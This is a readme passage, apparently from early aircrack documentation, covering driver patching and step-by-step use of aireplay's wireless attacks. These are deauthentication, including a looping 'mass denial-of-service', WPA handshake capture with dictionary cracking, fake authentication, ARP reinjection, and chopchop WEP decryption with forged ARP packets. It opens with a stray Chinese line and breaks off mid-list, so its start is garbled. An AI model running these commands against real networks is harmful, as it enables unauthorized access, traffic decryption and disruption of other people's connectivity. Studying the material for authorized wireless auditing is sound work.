readme.txt

读您的文件包然后写出其具体功能(至少要20个字)。尽量不要让站长

        wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-pre26.patch
        tar -xvzf wlanng-0.2.1-pre26.tar.gz
        cd wlanng-0.2.1-pre26
        patch -Np1 -i ../wlanng-0.2.1-pre26.patch
        make config && make all && make install
        mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
        /etc/init.d/pcmcia start
        modprobe prism2_pci &>/dev/null

      + Installing the r8180-sa2400 driver (RTL8180 cards)

        ifconfig wlan0 down
        rmmod r8180

        cd /usr/src
        wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
        wget http://100h.org/wlan/linux/patches/rtl8180-0.21.patch
        tar -xvzf rtl8180-0.21.tar.gz
        cd rtl8180-0.21
        patch -Np1 -i ../rtl8180-0.21.patch
        make && make install
        depmod -a
        modprobe r8180

      + Installing the rt2500 driver (Ralink b/g PCI/PCMCIA)

        ifconfig ra0 down
        rmmod rt2500

        cd /usr/src
        wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20050826.tgz
        tar -xvzf rt2500-cvs-20050826.tgz
        cd rt2500-cvs-20050826
        cd Module
        make && make install
        modprobe rt2500

        Make sure to load the driver with modprobe (not insmod) and to put the
        card in Monitor mode before bringing the interface up.

      + Installing the rt2570 driver (Ralink b/g USB)

        ifconfig rausb0 down
        rmmod rt2570

        cd /usr/src
        wget http://100h.org/wlan/linux/ralink/rt2570-cvs-20050826.tgz
        wget http://100h.org/wlan/linux/patches/rt2570-cvs-20050824.patch
        tar -xvzf rt2570-cvs-20050826.tgz
        cd rt2570-cvs-20050826
        patch -Np1 -i ../rt2570-cvs-20050824.patch
        cd Module
        make && make install
        modprobe rt2570


The driver won't compile.

    This usually happens because the linux headers don't match your current
    running kernel. In this situation, just recompile a fresh kernel, install
    it and reboot. Then, try again compiling the driver.

    See this HOWTO for more details about kernel compilation.

How do I use aireplay ?

    If the driver was properly patched, aireplay is able to inject raw 802.11
    packets in Monitor mode; it currently implements a set of five different
    attacks.

    If you get "ioctl(SIOCGIFINDEX) failed: No such device", double check that
    your device name is correct and that you haven't forgotten a parameter on
    the command line.

    In the following examples, 00:13:10:30:24:9C is the MAC address of the
    access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a
    wireless client.

      + Attack 0: deauthentication

        This attack is mostly useful to recover a hidden (not broadcasted)
        ESSID and for capturing WPA handshakes by forcing clients to
        reauthenticate. It can also be used to generate ARP requests as Windows
        clients sometimes flush their ARP cache when disconnected. Of course,
        this attack is totally useless if there are no associated wireless
        clients.

        It is usually more effective to target a specific station using the -c
        parameter.

        Some examples:

          o WPA Handshake capture with an Atheros

            airmon.sh start ath0
            airodump ath0 out 6  (switch to another console)
            aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
            (wait for a few seconds)
            aircrack -w /path/to/dictionary out.cap

          o ARP request generation with a Prism2 card

            airmon.sh start wlan0
            airodump wlan0 out 6  (switch to another console)
            aireplay -0 5 -a 00:13:10:30:24:9C wlan0
            aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

            After sending the five batches of deauthentication packets, we
            start listening for ARP requests with attack 3. The -h option is
            mandatory and has to be the MAC address of an associated client.

            If the driver is wlan-ng, you must run the airmon.sh script;
            otherwise the card won't be correctly setup for injection.

          o Mass denial-of-service with a RT2500 card

            airmon.sh start ra0
            aireplay -0 0 -a 00:13:10:30:24:9C ra0

            With parameter 0, this attack will loop forever sending
            deauthentication packets to the broadcast address, thus preventing
            clients from staying connected.

      + Attack 1: fake authentication

        This attack is particularly useful when there are no associated
        clients: we create a fake client MAC address which will be registered
        in the AP's association table. This address will then be used for
        attacks 3 (ARP request reinjection) and 4 ("chopchop" WEP decryption).

        However if this attack fails and there is already an associated client,
        it's more reliable to just use his MAC address (here,
        00:09:5B:EB:C5:2B) in attacks 3 and 4.

        aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
        12:14:06  Sending Authentication Request
        12:14:06  Authentication successful
        12:14:06  Sending Association Request
        12:14:07  Association successful :-)

        +---------------------------------------------------------------------+
        | With patched madwifi CVS 2005-08-14, it's possible to inject        |
        | packets while in Managed mode (the WEP key itself doesn't matter,   |
        | as long as the AP accepts Open-System authentication). So, instead  |
        | of running attack 1, you may just associate and inject / monitor    |
        | through the athXraw interface:                                      |
        |                                                                     |
        | ifconfig ath0 down hw ether 00:10:20:30:40:50                       |
        | iwconfig ath0 mode Managed essid myap key AAAAAAAAAA                |
        | ifconfig ath0 up                                                    |
        |                                                                     |
        | sysctl -w dev.ath0.rawdev=1                                         |
        | ifconfig ath0raw up                                                 |
        | airodump ath0raw out 6                                              |
        |                                                                     |
        | Then you can run attack 3 or 4 (aireplay will automatically replace |
        | ath0 with ath0raw below):                                           |
        |                                                                     |
        | aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0          |
        | aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0                          |
        |                                                                     |
        +---------------------------------------------------------------------+

        Some access points require to reassociate every 30 seconds, otherwise
        our fake client is considered disconnected. In this case, setup the
        periodic re-association delay:

        aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0

        If this attacks seems to fail (aireplay keeps sending authentication
        requests), MAC address filtering may be in place. Also make sure that:

          o You are close enough to the access point.
          o The driver is properly patched and installed.
          o The card is configured on the same channel as the AP.
          o The BSSID and ESSID (-a / -e options) are correct.
          o If Prism2, make sure the firmware was updated.

        As a reminder: you can't inject with a Centrino, Hermes, ACX1xx,
        Aironet, Marvel or Broadcom chipset because of firmware and/or driver
        limitations.

      + Attack 2: interactive packet replay

        This attack is mostly useless and is present for debugging purposes
        only. You could use it, for example, to replay "ToDS" packets coming
        from a wireless client; but in any case, attack 3 (ARP reinjection) is
        more effective.

        aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0

      + Attack 3: ARP-request reinjection

        The classic ARP-request replay attack is the most effective to generate
        new IVs, and works very reliably. You need either the MAC address of an
        associated client (00:09:5B:EB:C5:2B), of a fake MAC from attack 1
        (0:1:2:3:4:5). You may have to wait for a couple of minutes, or even
        longer, until an ARP request shows up; this attack will fail if there
        is no traffic.

        Please note that you can also reuse ARP requests from a previous
        capture using the -r switch.

        aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
        Saving ARP requests in replay_arp-0627-121526.cap
        You must also start airodump to capture replies.
        Read 2493 packets (got 1 ARP requests), sent 1305 packets...

      + Attack 4: KoreK's "chopchop" (CRC prediction)

        This attack, when successful, can decrypt a WEP data packet without
        knowing the key. It can even work against dynamic WEP. This attack does
        not recover the WEP key itself, but merely reveals the plaintext.
        However, most access points are not vulnerable at all. Some may seem
        vulnerable at first but actually drop data packets shorter that 60
        bytes. This attack requires at least one WEP data packet.

         1. First, we decrypt one packet :

            aireplay -4 -h 00:09:5B:EB:C5:2B ath0

         2. Let's have a look at the IP address :

            tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
            reading from file replay_dec-0627-022301.cap, link-type [...]
            IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

         3. Then, forge an ARP request.

            The source IP (192.168.1.100) doesn't matter, but the destination
            IP (192.168.1.2) must respond to ARP requests. The source MAC must
            belong to an associated station.

            ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
            00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

         4. And replay our forged ARP request :

            aireplay -2 -r arp.cap ath0


-------------------------------------------------------------------------------

    Finally, I'd like to thank all the many, many people who contributed to
    aircrack... you know who you are :-)

-------------------------------------------------------------------------------